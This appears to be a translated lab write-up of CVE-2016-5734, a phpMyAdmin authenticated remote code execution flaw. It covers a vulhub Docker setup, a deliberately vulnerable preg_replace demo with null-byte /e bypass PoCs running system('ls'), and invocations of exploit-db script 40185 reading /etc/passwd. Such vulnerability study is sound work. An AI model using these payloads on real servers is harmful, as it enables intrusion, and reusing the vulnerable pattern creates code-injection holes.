table of Contents
Vulnerability description
CVE-2016-5734 on the exploit-db is phpMyAdmin 4.6.2-Authenticated Remote Code Execution, which means the remote code execution of phpMyAdmin authenticated users. According to the description, all 4.6.x versions of phpMyAdmin affected (until 4.6.3) ), version 4.4.x (up to 4.4.15.7), and version 4.0.x (up to 4.0.10.16). The author of CVE used the preg_replace function in the version before php 5.4.7 to handle the bug of the null byte error, so that the injected code can be executed remotely.
Impact version
- phpmyadmin 4.6.x version (up to 4.6.3)
- phpmyadmin 4.4.x version (up to 4.4.15.7)
- phpmyadmin 4.0.x version (up to 4.0.10.16)
- PHP version: 4.3.0 ~5.4.6
Vulnerability environment construction
Use vulhub to directly docker start the environment with one key CVE-2018-12613 environment
Docker quick start and vulnerability environment construction
After downloading and installing vulhub, enter the /vulhub/phpmyadmin/CVE-2016-5734
directory and execute the following command to start the environment
sudo docker-compose up -d
After the installation is successful, check the port and find that the port is mapped on our 8080 port.
Visit localhost:8080 in the virtual machine, and the following interface appears, indicating that the installation is successful
Vulnerability analysis
-
Let ’s talk about the preg_replace function first : The
preg_replace function performs a regular expression search and replacement. -
Let me talk about the role of preg_replace \e :
if this deprecated modifier is set, preg_replace() will perform the replacement string as a php code evaluation after performing a backreference replacement to the replacement string (eval function method) , and use the execution result as the string actually involved in the replacement. Single quotes, double quotes, backslashes () and NULL characters will be escaped with backslashes when replacing backquotes.
Test the use \e
of code execution:
<?php
highlight_file(__FILE__);
$raw = $_GET['raw'];
$replace = $_GET['replace'];
$text = $_GET['text'];
$text = preg_replace('/'.$raw.'/e', $replace, $text);
?>
poc
?raw=a&replace=system("ls")&text=larry
If our demo becomes the following code, will there be loopholes?
<?php
highlight_file(__FILE__);
$raw = $_GET['raw'];
$replace = $_GET['replace'];
$text = $_GET['text'];
$text = preg_replace('/'.$raw.'/i', $replace, $text);
?>
In fact, it can be bypassed. When the php version is less than 5.4.7, inject a null character into the pattern to cause truncation, and pass in the e modifier, which can be executed according to the php code.
poc
?raw=a/e%00&replace=system(%22ls%22)&text=larry
For phpmyadmin code vulnerability analysis, you can view the following article:
https://xz.aliyun.com/t/7836#toc-5
Exploit
Conditions of use: need to know the database account password
Download the exploit script:
https://www.exploit-db.com/exploits/40185
Script utilization method:
-u account
-p password
-c code execution (php code) uname -a is executed by default
python 40185.py -u root -p root http://192.168.154.3:8080
python 40185.py -u root -p root -c "system('cat /etc/passwd')" http://192.168.154.3:8080
Vulnerability hardening
Update php or phpmyadmin
Reference link
https://larry.ngrep.me/2016/09/21/cve-2016-5734-analysis/
https://xz.aliyun.com/t/7836